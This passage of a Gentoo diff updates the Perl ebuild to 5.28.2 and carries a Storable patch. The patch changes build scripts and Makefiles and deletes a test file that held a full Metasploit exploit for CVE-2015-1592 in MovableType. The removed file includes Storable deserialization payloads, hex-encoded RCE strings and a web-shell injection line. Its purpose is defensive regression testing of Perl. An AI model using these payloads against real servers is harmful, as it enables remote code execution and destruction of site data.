722 ++run time Storable may fail the freeze() or thaw() unnecessarily. If
723 ++it's larger at build time Storable may segmentation fault when
724 ++processing a deep structure at run time.
725 +
726 + =item *
727 +
728 +@@ -970,6 +979,8 @@ stack without triggering Storable's recursion protection.
729 +
730 + =back
731 +
732 ++So these now have simple defaults rather than probing at build-time.
733 ++
734 + You can control the maximum array and hash recursion depths by
735 + modifying C<$Storable::recursion_limit> and
736 + C<$Storable::recursion_limit_hash> respectively. Either can be set to
737 +diff --git a/dist/Storable/stacksize b/dist/Storable/stacksize
738 +index 14e0739..f93eccc 100644
739 +--- a/dist/Storable/stacksize
740 ++++ b/dist/Storable/stacksize
741 +@@ -1,21 +1,17 @@
742 + #!/usr/bin/perl
743 + # binary search maximum stack depth for arrays and hashes
744 +-# and store it in lib/Storable/Limit.pm
745 ++# and report it to stdout as code to set the limits
746 +
747 + use Config;
748 + use Cwd;
749 + use File::Spec;
750 + use strict;
751 +
752 +--d "lib" or mkdir "lib";
753 +--d "lib/Storable" or mkdir "lib/Storable";
754 +-
755 +-my $fn = "lib/Storable/Limit.pm";
756 + my $ptrsize = $Config{ptrsize};
757 + my ($bad1, $bad2) = (65001, 25000);
758 + sub QUIET () {
759 + (defined $ENV{MAKEFLAGS} and $ENV{MAKEFLAGS} =~ /\b(s|silent|quiet)\b/
760 +- and !defined($ENV{TRAVIS}))
761 ++ and !defined($ENV{TRAVIS})) || @ARGV && $ARGV[0] eq "-q"
762 + ? 1 : 0
763 + }
764 + sub PARALLEL () {
765 +@@ -32,11 +28,7 @@ sub is_miniperl {
766 + }
767 +
768 + if (is_miniperl()) {
769 +- if ($Config{usecrosscompile}) {
770 +- write_limits(500, 265);
771 +- exit;
772 +- }
773 +- die "Should not run during miniperl\n";
774 ++ die "Should not run using miniperl\n";
775 + }
776 + my $prefix = "";
777 + if ($^O eq "MSWin32") {
778 +@@ -51,58 +43,28 @@ elsif (system("ulimit -c 0 ;") == 0) {
779 + # try to prevent core dumps
780 + $prefix = "ulimit -c 0 ; ";
781 + }
782 +-if (@ARGV and $ARGV[0] eq '--core') {
783 +- $ENV{PERL_CORE} = 1;
784 +-}
785 + my $PERL = $^X;
786 +-if ($ENV{PERL_CORE}) {
787 +- my $path;
788 +- my $ldlib = $Config{ldlibpthname};
789 +- if (-d 'dist/Storable') {
790 +- chdir 'dist/Storable';
791 +- $PERL = "../../$PERL" unless $PERL =~ m|^/|;
792 +- }
793 +- if ($ldlib) {
794 +- $path = getcwd()."/../..";
795 +- }
796 +- if ($^O eq 'MSWin32' and -d '../dist/Storable') {
797 +- chdir '..\dist\Storable';
798 +- $PERL = "..\\..\\$PERL" unless $PERL =~ /^[A-Za-z]:\\/;
799 +- }
800 +- $PERL = "\"$PERL\"" if $PERL =~ / /;
801 +- if ($ldlib and $ldlib ne 'PATH') {
802 +- $PERL = "$ldlib=$path $PERL";
803 +- }
804 +-}
805 +-
806 + if ($^O eq "MSWin32") {
807 + require Win32;
808 + my ($str, $major, $minor) = Win32::GetOSVersion();
809 + if ($major < 6 || $major == 6 && $minor < 1) {
810 +- print "Using defaults for older Win32\n";
811 ++ print "# Using defaults for older Win32\n";
812 + write_limits(500, 256);
813 + exit;
814 + }
815 + }
816 + my ($n, $good, $bad, $found) =
817 + (65000, 100, $bad1, undef);
818 +-print "probe for max. stack sizes...\n" unless QUIET;
819 ++print "# probe for max. stack sizes...\n" unless QUIET;
820 + # -I. since we're run before pm_to_blib (which is going to copy the
821 + # file we create) and need to load our Storable.pm, not the already
822 + # installed Storable.pm
823 +-my $mblib = '-Mblib -I.';
824 +-if ($ENV{PERL_CORE}) {
825 +- if ($^O eq 'MSWin32') {
826 +- $mblib = '-I..\..\lib\auto -I..\..\lib';
827 +- } else {
828 +- $mblib = '-I../../lib/auto -I../../lib';
829 +- }
830 ++my $mblib = '';
831 ++if (-d 'blib') {
832 ++ $mblib = '-Mblib -I.';
833 + }
834 +-if (PARALLEL) {
835 +- # problem with parallel builds. wait for INST_DYNAMIC linking to be done.
836 +- # the problem is the RM_F INST_DYNAMIC race.
837 +- print "parallel build race - wait for linker ...\n" unless QUIET;
838 +- sleep(2.0);
839 ++elsif (-f "Configure") {
840 ++ $mblib = '-Ilib';
841 + }
842 +
843 + sub cmd {
844 +@@ -117,7 +79,7 @@ sub cmd {
845 + sub good {
846 + my $i = shift; # this passed
847 + my $j = $i + abs(int(($bad - $i) / 2));
848 +- print "Storable: determining recursion limit: $i passed, try more $j ...\n" unless QUIET;
849 ++ print "# Storable: determining recursion limit: $i passed, try more $j ...\n" unless QUIET;
850 + $good = $i;
851 + if ($j <= $i) {
852 + $found++;
853 +@@ -128,7 +90,7 @@ sub good {
854 + sub bad {
855 + my $i = shift; # this failed
856 + my $j = $i - abs(int(($i - $good) / 2));
857 +- print "Storable: determining recursion limit: $i too big, try less $j ...\n" unless QUIET;
858 ++ print "# Storable: determining recursion limit: $i too big, try less $j ...\n" unless QUIET;
859 + $bad = $i;
860 + if ($j >= $i) {
861 + $j = $good;
862 +@@ -162,7 +124,7 @@ while (!$found) {
863 + $n = bad($n);
864 + }
865 + }
866 +-print "MAX_DEPTH = $n\n" unless QUIET;
867 ++print "# MAX_DEPTH = $n\n" unless QUIET;
868 + my $max_depth = $n;
869 +
870 + ($n, $good, $bad, $found) =
871 +@@ -186,13 +148,13 @@ if ($max_depth == $bad1-1
872 + and $n == $bad2-1)
873 + {
874 + # more likely the shell. travis docker ubuntu, mingw e.g.
875 +- print "Error: Apparently your system(SHELLSTRING) cannot catch stack overflows\n"
876 ++ print "# Apparently your system(SHELLSTRING) cannot catch stack overflows\n"
877 + unless QUIET;
878 + $max_depth = 512;
879 + $n = 256;
880 + print "MAX_DEPTH = $max_depth\n" unless QUIET;
881 + }
882 +-print "MAX_DEPTH_HASH = $n\n" unless QUIET;
883 ++print "# MAX_DEPTH_HASH = $n\n" unless QUIET;
884 + my $max_depth_hash = $n;
885 +
886 + # Previously this calculation was done in the macro, calculate it here
887 +@@ -203,7 +165,7 @@ my $max_depth_hash = $n;
888 + # several apparently random failures here, eg. working in one
889 + # configuration, but not in a very similar configuration.
890 + $max_depth = int(0.6 * $max_depth);
891 +-$max_depth_hash = int(0.6 * $max_depth);
892 ++$max_depth_hash = int(0.6 * $max_depth_hash);
893 +
894 + my $stack_reserve = $^O eq "MSWin32" ? 32 : 16;
895 + if ($] ge "5.016" && !($^O eq "cygwin" && $ptrsize == 8)) {
896 +@@ -221,16 +183,11 @@ write_limits($max_depth, $max_depth_hash);
897 +
898 + sub write_limits {
899 + my ($max_depth, $max_depth_hash) = @_;
900 +- my $f;
901 +- open $f, ">", $fn or die "$fn $!";
902 +- print $f <<EOS;
903 ++ print <<EOS;
904 + # bisected by stacksize
905 + \$Storable::recursion_limit = $max_depth
906 + unless defined \$Storable::recursion_limit;
907 + \$Storable::recursion_limit_hash = $max_depth_hash
908 + unless defined \$Storable::recursion_limit_hash;
909 +-1;
910 + EOS
911 +- close $f
912 +- or die "Failed to close $fn: $!\n";
913 + }
914 +diff --git a/dist/Storable/t/CVE-2015-1592.inc b/dist/Storable/t/CVE-2015-1592.inc
915 +deleted file mode 100644
916 +index 481dba5..0000000
917 +--- a/dist/Storable/t/CVE-2015-1592.inc
918 ++++ /dev/null
919 +@@ -1,261 +0,0 @@
920 +-#!/usr/bin/perl
921 +-
922 +-=pod
923 +-
924 +-class MetasploitModule < Msf::Exploit::Remote
925 +- Rank = GoodRanking
926 +-
927 +- include Msf::Exploit::Remote::HttpClient
928 +-
929 +- def initialize(info = {})
930 +- super(update_info(info,
931 +- 'Name' => 'SixApart MovableType Storable Perl Code Execution',
932 +- 'Description' => %q{
933 +- This module exploits a serialization flaw in MovableType before 5.2.12 to execute
934 +- arbitrary code. The default nondestructive mode depends on the target server having
935 +- the Object::MultiType and DateTime Perl modules installed in Perl's @INC paths.
936 +- The destructive mode of operation uses only required MovableType dependencies,
937 +- but it will noticeably corrupt the MovableType installation.
938 +- },
939 +- 'Author' =>
940 +- [
941 +- 'John Lightsey',
942 +- ],
943 +- 'License' => MSF_LICENSE,
944 +- 'References' =>
945 +- [
946 +- [ 'CVE', '2015-1592' ],
947 +- [ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ],
948 +- ],
949 +- 'Privileged' => false, # web server context
950 +- 'Payload' =>
951 +- {
952 +- 'DisableNops' => true,
953 +- 'BadChars' => ' ',
954 +- 'Space' => 1024,
955 +- },
956 +- 'Compat' =>
957 +- {
958 +- 'PayloadType' => 'cmd'
959 +- },
960 +- 'Platform' => ['unix'],
961 +- 'Arch' => ARCH_CMD,
962 +- 'Targets' => [['Automatic', {}]],
963 +- 'DisclosureDate' => 'Feb 11 2015',
964 +- 'DefaultTarget' => 0))
965 +-
966 +- register_options(
967 +- [
968 +- OptString.new('TARGETURI', [true, 'MoveableType cgi-bin directory path', '/cgi-bin/mt/']),
969 +- OptBool.new('DESTRUCTIVE', [true, 'Use destructive attack method (more likely to succeed, but corrupts target system.)', false])
970 +- ], self.class
971 +- )
972 +-
973 +- end
974 +-
975 +-=cut
976 +-
977 +-# generate config parameters for injection checks
978 +-
979 +-use Storable;
980 +-
981 +-{
982 +-
983 +- package XXXCHECKXXX;
984 +-
985 +- sub STORABLE_thaw {
986 +- return 1;
987 +- }
988 +-
989 +- sub STORABLE_freeze {
990 +- return 1;
991 +- }
992 +-
993 +-}
994 +-
995 +-my $check_obj = bless { ignore => 'this' }, XXXCHECKXXX;
996 +-my $frozen2 = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $check_obj});
997 +-$frozen2 = unpack 'H*', $frozen2;
998 +-#print "LFI test for storable flaw is: $frozen2\n";
999 +-
1000 +-{
1001 +- package DateTime;
1002 +- use overload '+' => sub { 'ignored' };
1003 +-}
1004 +-
1005 +-=pod
1006 +-
1007 +- def check
1008 +- vprint_status("Sending storable test injection for XXXCHECKXXX.pm load failure")
1009 +- res = send_request_cgi({
1010 +- 'method' => 'GET',
1011 +- 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
1012 +- 'vars_get' => {
1013 +- '__mode' => 'retry',
1014 +- 'step' => 'configure',
1015 +- 'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078'
1016 +- }
1017 +- })
1018 +-
1019 +- unless res && res.code == 200 && res.body.include?("Can't locate XXXCHECKXXX.pm")
1020 +- vprint_status("Failed XXXCHECKXXX.pm load test");
1021 +- return Exploit::CheckCode::Safe
1022 +- end
1023 +- Exploit::CheckCode::Vulnerable
1024 +- end
1025 +-
1026 +- def exploit
1027 +- if datastore['DESTRUCTIVE']
1028 +- exploit_destructive
1029 +- else
1030 +- exploit_nondestructive
1031 +- end
1032 +- end
1033 +-
1034 +-=cut
1035 +-
1036 +-#!/usr/bin/perl
1037 +-
1038 +-# Generate nondestructive config parameter for RCE via Object::MultiType
1039 +-# and Try::Tiny. The generated value requires minor modification to insert
1040 +-# the payload inside the system() call and resize the padding.
1041 +-
1042 +-use Storable;
1043 +-
1044 +-{
1045 +- package Object::MultiType;
1046 +- use overload '+' => sub { 'ingored' };
1047 +-}
1048 +-
1049 +-{
1050 +- package Object::MultiType::Saver;
1051 +-}
1052 +-
1053 +-#{
1054 +-# package DateTime;
1055 +-# use overload '+' => sub { 'ingored' };
1056 +-#}
1057 +-
1058 +-{
1059 +- package Try::Tiny::ScopeGuard;
1060 +-}
1061 +-
1062 +-my $try_tiny_loader = bless {}, 'DateTime';
1063 +-my $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver';
1064 +-my $multitype_coderef = bless \$multitype_saver, 'Object::MultiType';
1065 +-my $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\n\n};system(q{});' . ('#' x 1025) . "\nexit;"], 'Try::Tiny::ScopeGuard';
1066 +-
1067 +-my $data = [$try_tiny_loader, $try_tiny_executor];
1068 +-my $frozen1 = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);
1069 +-$frozen1 = unpack 'H*', $frozen1;
1070 +-#print "RCE payload requiring Object::MultiType and DateTime: $frozen1\n";
1071 +-
1072 +-=pod
1073 +-
1074 +- def exploit_nondestructive
1075 +- print_status("Using nondestructive attack method")
1076 +- config_payload = "53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b"
1077 +- config_payload << payload.encoded.unpack('H*')[0]
1078 +- config_payload << "7d293b"
1079 +- config_payload << "23" * (1025 - payload.encoded.length)
1080 +- config_payload << "0a657869743b"
1081 +-
1082 +- print_status("Sending payload (#{payload.raw.length} bytes)")
1083 +-
1084 +- send_request_cgi({
1085 +- 'method' => 'GET',
1086 +- 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
1087 +- 'vars_get' => {
1088 +- '__mode' => 'retry',
1089 +- 'step' => 'configure',
1090 +- 'config' => config_payload
1091 +- }
1092 +- }, 5)
1093 +- end
1094 +-
1095 +-=cut
1096 +-
1097 +-#!/usr/bin/perl
1098 +-
1099 +-# Generate destructive config parameter to unlink mt-config.cgi
1100 +-
1101 +-use Storable;
1102 +-
1103 +-{
1104 +- package CGITempFile;
1105 +-}
1106 +-
1107 +-my $unlink_target = "mt-config.cgi";
1108 +-my $cgitempfile = bless \$unlink_target, "CGITempFile";
1109 +-
1110 +-$data = [$cgitempfile];
1111 +-my $frozen_data = Storable::freeze($data);
1112 +-my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . $frozen_data;
1113 +-$frozen = unpack 'H*', $frozen;
1114 +-#print "RCE unlink payload requiring CGI: $frozen\n";
1115 +-
1116 +-# $Storable::DEBUGME = 1;
1117 +-# $^W = 1;
1118 +-Storable::thaw($frozen_data);
1119 +-
1120 +-=pod
1121 +-
1122 +-def exploit_destructive
1123 +- print_status("Using destructive attack method")
1124 +- # First we need to delete mt-config.cgi using the storable injection
1125 +-
1126 +- print_status("Sending storable injection to unlink mt-config.cgi")
1127 +-
1128 +- res = send_request_cgi({
1129 +- 'method' => 'GET',
1130 +- 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
1131 +- 'vars_get' => {
1132 +- '__mode' => 'retry',
1133 +- 'step' => 'configure',
1134 +- 'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769'
1135 +- }
1136 +- })
1137 +-
1138 +- if res && res.code == 200
1139 +- print_status("Successfully sent unlink request")
1140 +- else
1141 +- fail_with(Failure::Unknown, "Error sending unlink request")
1142 +- end
1143 +-
1144 +- # Now we rewrite mt-config.cgi to accept a payload
1145 +-
1146 +- print_status("Rewriting mt-config.cgi to accept the payload")
1147 +-
1148 +- res = send_request_cgi({
1149 +- 'method' => 'GET',
1150 +- 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
1151 +- 'vars_get' => {
1152 +- '__mode' => 'next_step',
1153 +- 'step' => 'optional',
1154 +- 'default_language' => 'en_us',
1155 +- 'email_address_main' => "x\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\n\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1",
1156 +- 'set_static_uri_to' => '/',
1157 +- 'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/',
1158 +- }
1159 +- })
1160 +-
1161 +- if res && res.code == 200
1162 +- print_status("Successfully sent mt-config rewrite request")
1163 +- else
1164 +- fail_with(Failure::Unknown, "Error sending mt-config rewrite request")
1165 +- end
1166 +-
1167 +- # Finally send the payload
1168 +-
1169 +- print_status("Sending payload request")
1170 +-
1171 +- send_request_cgi({
1172 +- 'method' => 'GET',
1173 +- 'uri' => normalize_uri(target_uri.path, 'mt.cgi'),
1174 +- 'vars_get' => {
1175 +- 'xyzzy' => payload.encoded,
1176 +- }
1177 +- }, 5)
1178 +- end
1179 +-
1180 +-=cut
1181 +diff --git a/dist/Storable/t/CVE-2015-1592.t b/dist/Storable/t/CVE-2015-1592.t
1182 +index 2730cdc..a71f44c 100644
1183 +--- a/dist/Storable/t/CVE-2015-1592.t
1184 ++++ b/dist/Storable/t/CVE-2015-1592.t
1185 +@@ -1,22 +1,21 @@
1186 + #!/usr/bin/perl
1187 +
1188 + use strict;
1189 ++use warnings;
1190 + use Test::More;
1191 ++use Storable qw(freeze thaw);
1192 + plan tests => 1;
1193 +
1194 +-use File::Temp qw(tempdir);
1195 +-use File::Spec;
1196 +-my $tmp_dir = tempdir(CLEANUP => 1);
1197 +-my $tmp_file = File::Spec->catfile($tmp_dir, 'sploit');
1198 ++# this original worked with the packaged exploit, but that
1199 ++# triggers virus scanners, so test for the behaviour instead
1200 ++my $x = bless \(my $y = "mt-config.cgi"), "CGITempFile";
1201 ++
1202 ++my $frozen = freeze($x);
1203 +
1204 +-my $file = __FILE__;
1205 +-$file =~ s/\.t$/.inc/;
1206 +-my $inc = $ENV{PERL_CORE} ? "-Ilib -I../../lib" : "-I".join(" -I", @INC);
1207 +-system qq($^X $inc -w "$file" 2>$tmp_file);
1208 +-open(my $fh, "<", $tmp_file) or die "$tmp_file $!";
1209 + {
1210 +- local $/;
1211 +- my $err = <$fh>;
1212 +- like($err, qr/SECURITY: Movable-Type CVE-2015-1592 Storable metasploit attack/,
1213 +- 'Detect CVE-2015-1592');
1214 ++ my $warnings = '';
1215 ++ local $SIG{__WARN__} = sub { $warnings .= "@_" };
1216 ++ thaw($frozen);
1217 ++ like($warnings, qr/SECURITY: Movable-Type CVE-2015-1592 Storable metasploit attack/,
1218 ++ 'Detect CVE-2015-1592');
1219 + }
1220 +diff --git a/dist/Storable/t/dclone.t b/dist/Storable/t/dclone.t
1221 +index af3d7f6..ce6c756 100644
1222 +--- a/dist/Storable/t/dclone.t
1223 ++++ b/dist/Storable/t/dclone.t
1224 +@@ -87,6 +87,8 @@ SKIP: {
1225 + # Do not fail if Tie::Hash and/or Tie::StdHash is not available
1226 + skip 'No Tie::StdHash available', 2
1227 + unless eval { require Tie::Hash; scalar keys %Tie::StdHash:: };
1228 ++ skip 'This version of perl has problems with Tie::StdHash', 2
1229 ++ if $] eq "5.008";
1230 + tie my %tie, "Tie::StdHash" or die $!;
1231 + $tie{array} = [1,2,3,4];
1232 + $tie{hash} = {1,2,3,4};
1233 +diff --git a/dist/Storable/t/recurse.t b/dist/Storable/t/recurse.t
1234 +index 63fde90..b5967a0 100644
1235 +--- a/dist/Storable/t/recurse.t
1236 ++++ b/dist/Storable/t/recurse.t
1237 +@@ -318,9 +318,11 @@ is($refcount_ok, 1, "check refcount");
1238 + # Small 64bit systems fail with 1200 (c++ debugging), with gcc 3000.
1239 + # Optimized 64bit allows up to 33.000 recursion depth.
1240 + # with asan the limit is 255 though.
1241 ++
1242 ++local $Storable::recursion_limit = 30;
1243 ++local $Storable::recursion_limit_hash = 20;
1244 + sub MAX_DEPTH () { Storable::stack_depth() }
1245 + sub MAX_DEPTH_HASH () { Storable::stack_depth_hash() }
1246 +-sub OVERFLOW () { 35000 }
1247 + {
1248 + my $t;
1249 + print "# max depth ", MAX_DEPTH, "\n";
1250 +diff --git a/dist/Storable/t/threads.t b/dist/Storable/t/threads.t
1251 +index 0bc2486..0b34334 100644
1252 +--- a/dist/Storable/t/threads.t
1253 ++++ b/dist/Storable/t/threads.t
1254 +@@ -28,6 +28,10 @@ sub BEGIN {
1255 + print "1..0 # Skip: no threads\n";
1256 + exit 0;
1257 + }
1258 ++ if ($] eq "5.008" || $] eq "5.010000") {
1259 ++ print "1..0 # Skip: threads unreliable in perl-$]\n";
1260 ++ exit 0;
1261 ++ }
1262 + # - is \W, so can't use \b at start. Negative look ahead and look behind
1263 + # works at start/end of string, or where preceded/followed by spaces
1264 + if ($] == 5.008002 and eval q{ $Config{'ccflags'} =~ /(?<!\S)-DDEBUGGING(?!\S)/ }) {
1265 +diff --git a/mkppport.lst b/mkppport.lst
1266 +index a443dac..b3992c8 100644
1267 +--- a/mkppport.lst
1268 ++++ b/mkppport.lst
1269 +@@ -12,3 +12,4 @@ cpan/Win32API-File
1270 + dist/IO
1271 + dist/PathTools
1272 + dist/Time-HiRes
1273 ++dist/Storable
1274 +diff --git a/win32/GNUmakefile b/win32/GNUmakefile
1275 +index 200d8a5..1c163d7 100644
1276 +--- a/win32/GNUmakefile
1277 ++++ b/win32/GNUmakefile
1278 +@@ -1177,7 +1177,7 @@ CFG_VARS = \
1279 +
1280 + .PHONY: all info
1281 +
1282 +-all : info rebasePE Extensions_nonxs $(PERLSTATIC) PostExt
1283 ++all : info rebasePE Extensions_nonxs $(PERLSTATIC)
1284 +
1285 + info :
1286 + @echo # CCTYPE=$(CCTYPE)
1287 +@@ -1621,16 +1621,6 @@ Extensions_clean :
1288 + Extensions_realclean :
1289 + -if exist $(MINIPERL) $(MINIPERL) -I..\lib ..\make_ext.pl "MAKE=$(PLMAKE)" --dir=$(CPANDIR) --dir=$(DISTDIR) --dir=$(EXTDIR) --all --target=realclean
1290 +
1291 +-PostExt : ..\lib\Storable\Limit.pm
1292 +-
1293 +-# we need the exe, perl(ver).dll, and the Exporter, Storable, Win32 extensions
1294 +-# rebasePE most of that, including adjustment for static builds, so we
1295 +-# just need non-xs extensions
1296 +-..\lib\Storable\Limit.pm : rebasePE Extensions_nonxs
1297 +- $(PLMAKE) -C ..\dist\Storable lib\Storable\Limit.pm
1298 +- if not exist ..\lib\Storable mkdir ..\lib\Storable
1299 +- copy ..\dist\Storable\lib\Storable\Limit.pm ..\lib\Storable\Limit.pm
1300 +-
1301 + # all PE files need to be built by the time this target runs, PP files can still
1302 + # be running in parallel like UNIDATAFILES, this target a placeholder for the
1303 + # future
1304 +diff --git a/win32/Makefile b/win32/Makefile
1305 +index 481fcd8..8e7878c 100644
1306 +--- a/win32/Makefile
1307 ++++ b/win32/Makefile
1308 +@@ -948,7 +948,7 @@ CFG_VARS = \
1309 + #
1310 +
1311 + all : .\config.h ..\git_version.h $(GLOBEXE) $(CONFIGPM) \
1312 +- $(UNIDATAFILES) MakePPPort $(PERLEXE) Extensions_nonxs Extensions PostExt \
1313 ++ $(UNIDATAFILES) MakePPPort $(PERLEXE) Extensions_nonxs Extensions \
1314 + $(PERLSTATIC)
1315 + @echo Everything is up to date. '$(MAKE_BARE) test' to run test suite.
1316 +
1317 +@@ -1234,13 +1234,6 @@ Extensions_clean:
1318 + Extensions_realclean:
1319 + -if exist $(MINIPERL) $(MINIPERL) -I..\lib ..\make_ext.pl "MAKE=$(MAKE)" --dir=$(CPANDIR) --dir=$(DISTDIR) --dir=$(EXTDIR) --all --target=realclean
1320 +
1321 +-PostExt: ..\lib\Storable\Limit.pm
1322 +-
1323 +-..\lib\Storable\Limit.pm: $(PERLEXE) Extensions
1324 +- cd ..\dist\Storable && $(MAKE) lib\Storable\Limit.pm
1325 +- if not exist ..\lib\Storable mkdir ..\lib\Storable
1326 +- copy ..\dist\Storable\lib\Storable\Limit.pm ..\lib\Storable\Limit.pm
1327 +-
1328 + #-------------------------------------------------------------------------------
1329 +
1330 + doc: $(PERLEXE) ..\pod\perltoc.pod
1331 +@@ -1319,7 +1312,6 @@ distclean: realclean
1332 + -del /f $(LIBDIR)\Time\HiRes.pm
1333 + -del /f $(LIBDIR)\Unicode\Normalize.pm
1334 + -del /f $(LIBDIR)\Math\BigInt\FastCalc.pm
1335 +- -del /f $(LIBDIR)\Storable.pm $(LIBDIR)\Storable\Limit.pm
1336 + -del /f $(LIBDIR)\Win32.pm
1337 + -del /f $(LIBDIR)\Win32CORE.pm
1338 + -del /f $(LIBDIR)\Win32API\File.pm
1339 +diff --git a/win32/makefile.mk b/win32/makefile.mk
1340 +index 7dae753..8122c75 100644
1341 +--- a/win32/makefile.mk
1342 ++++ b/win32/makefile.mk
1343 +@@ -1148,7 +1148,7 @@ CFG_VARS = \
1344 + # Top targets
1345 + #
1346 +
1347 +-all : CHECKDMAKE rebasePE Extensions_nonxs $(PERLSTATIC) PostExt
1348 ++all : CHECKDMAKE rebasePE Extensions_nonxs $(PERLSTATIC)
1349 +
1350 + ..\regcomp$(o) : ..\regnodes.h ..\regcharclass.h
1351 +
1352 +@@ -1572,17 +1572,6 @@ rebasePE : Extensions $(PERLDLL) $(NORMALIZE_DYN) $(PERLEXE)
1353 + .ENDIF
1354 + $(NOOP)
1355 +
1356 +-PostExt : ..\lib\Storable\Limit.pm
1357 +- $(NOOP)
1358 +-
1359 +-# we need the exe, perl(ver).dll, and the Exporter, Storable, Win32 extensions
1360 +-# rebasePE most of that, including adjustment for static builds, so we
1361 +-# just need non-xs extensions
1362 +-..\lib\Storable\Limit.pm : rebasePE Extensions_nonxs
1363 +- cd ..\dist\Storable && $(MAKE) lib\Storable\Limit.pm
1364 +- if not exist ..\lib\Storable mkdir ..\lib\Storable
1365 +- copy ..\dist\Storable\lib\Storable\Limit.pm ..\lib\Storable\Limit.pm
1366 +-
1367 + #-------------------------------------------------------------------------------
1368 +
1369 +
1370 +@@ -1657,7 +1646,7 @@ distclean: realclean
1371 + -del /f $(LIBDIR)\Time\HiRes.pm
1372 + -del /f $(LIBDIR)\Unicode\Normalize.pm
1373 + -del /f $(LIBDIR)\Math\BigInt\FastCalc.pm
1374 +- -del /f $(LIBDIR)\Storable.pm $(LIBDIR)\Storable\Limit.pm
1375 ++ -del /f $(LIBDIR)\Storable.pm
1376 + -del /f $(LIBDIR)\Win32.pm
1377 + -del /f $(LIBDIR)\Win32CORE.pm
1378 + -del /f $(LIBDIR)\Win32API\File.pm
1379 +--
1380 +2.21.0
1381 +
1382
1383 diff --git a/dev-lang/perl/perl-5.28.1.ebuild b/dev-lang/perl/perl-5.28.2.ebuild
1384 similarity index 97%
1385 rename from dev-lang/perl/perl-5.28.1.ebuild
1386 rename to dev-lang/perl/perl-5.28.2.ebuild
1387 index 05c722d..9de40db 100644
1388 --- a/dev-lang/perl/perl-5.28.1.ebuild
1389 +++ b/dev-lang/perl/perl-5.28.2.ebuild
1390 @@ -5,18 +5,18 @@ EAPI=6
1391
1392 inherit eutils alternatives flag-o-matic toolchain-funcs multilib multiprocessing
1393
1394 -PATCH_VER=1
1395 +PATCH_VER=2
1396 CROSS_VER=1.2.2
1397 -PATCH_BASE="perl-5.28.0-patches-${PATCH_VER}"
1398 +PATCH_BASE="perl-5.28.2-patches-${PATCH_VER}"
1399 +PATCH_DEV=dilfridge
1400
1401 -PATCHES=( "${FILESDIR}"/5.28/${PN}-5.28.1-part{1,2,3,4,5}.patch )
1402 -
1403 -DIST_AUTHOR=XSAWYERX
1404 +DIST_AUTHOR=SHAY
1405
1406 # Greatest first, don't include yourself
1407 # Devel point-releases are not ABI-intercompatible, but stable point releases are
1408 # BIN_OLDVERSEN is contains only C-ABI-intercompatible versions
1409 -PERL_BIN_OLDVERSEN=""
1410 +PERL_BIN_OLDVERSEN="5.28.0"
1411 +
1412 if [[ "${PV##*.}" == "9999" ]]; then
1413 DIST_VERSION=5.28.0
1414 else
1415 @@ -42,7 +42,7 @@ SRC_URI="
1416 mirror://cpan/authors/id/${DIST_AUTHOR:0:1}/${DIST_AUTHOR:0:2}/${DIST_AUTHOR}/${MY_P}.tar.xz
1417 https://github.com/gentoo-perl/perl-patchset/releases/download/${PATCH_BASE}/${PATCH_BASE}.tar.xz
1418 mirror://gentoo/${PATCH_BASE}.tar.xz
1419 - https://dev.gentoo.org/~kentnl/distfiles/${PATCH_BASE}.tar.xz
1420 + https://dev.gentoo.org/~${PATCH_DEV}/distfiles/${PATCH_BASE}.tar.xz
1421 https://github.com/arsv/perl-cross/releases/download/${CROSS_VER}/perl-cross-${CROSS_VER}.tar.gz
1422 "
1423 HOMEPAGE="https://www.perl.org/"
1424 @@ -77,7 +77,7 @@ PDEPEND="
1425 S="${WORKDIR}/${MY_P}"
1426
1427 dual_scripts() {
1428 - src_remove_dual perl-core/Archive-Tar 2.280.0 ptar ptardiff ptargrep
1429 + src_remove_dual perl-core/Archive-Tar 2.300.0 ptar ptardiff ptargrep
1430 src_remove_dual perl-core/CPAN 2.200.0 cpan
1431 src_remove_dual perl-core/Digest-SHA 6.10.0 shasum
1432 src_remove_dual perl-core/Encode 2.970.0 enc2xs piconv
1433 @@ -85,7 +85,7 @@ dual_scripts() {
1434 src_remove_dual perl-core/ExtUtils-ParseXS 3.390.0 xsubpp
1435 src_remove_dual perl-core/IO-Compress 2.74.0 zipdetails
1436 src_remove_dual perl-core/JSON-PP 2.970.10 json_pp
1437 - src_remove_dual perl-core/Module-CoreList 5.201.806.220 corelist
1438 + src_remove_dual perl-core/Module-CoreList 5.201.904.190 corelist
1439 src_remove_dual perl-core/Pod-Parser 1.630.0 pod2usage podchecker podselect
1440 src_remove_dual perl-core/Pod-Perldoc 3.280.100 perldoc
1441 src_remove_dual perl-core/Test-Harness 3.420.0 prove
1442 @@ -305,6 +305,9 @@ src_prepare() {
1443 epatch "${FILESDIR}/${PN}-5.26.2-hppa.patch" # bug 634162
1444 fi
1445
1446 + # This fixes Storage/libperl segfaults on non glibc platforms
1447 + epatch "${FILESDIR}/5.28/${P}-portability.patch"
1448 +
1449 if [[ ${CHOST} == *-solaris* ]] ; then
1450 # do NOT mess with nsl, on Solaris this is always necessary,
1451 # when -lsocket is used e.g. to get h_errno
1452 @@ -482,7 +485,7 @@ src_configure() {
1453
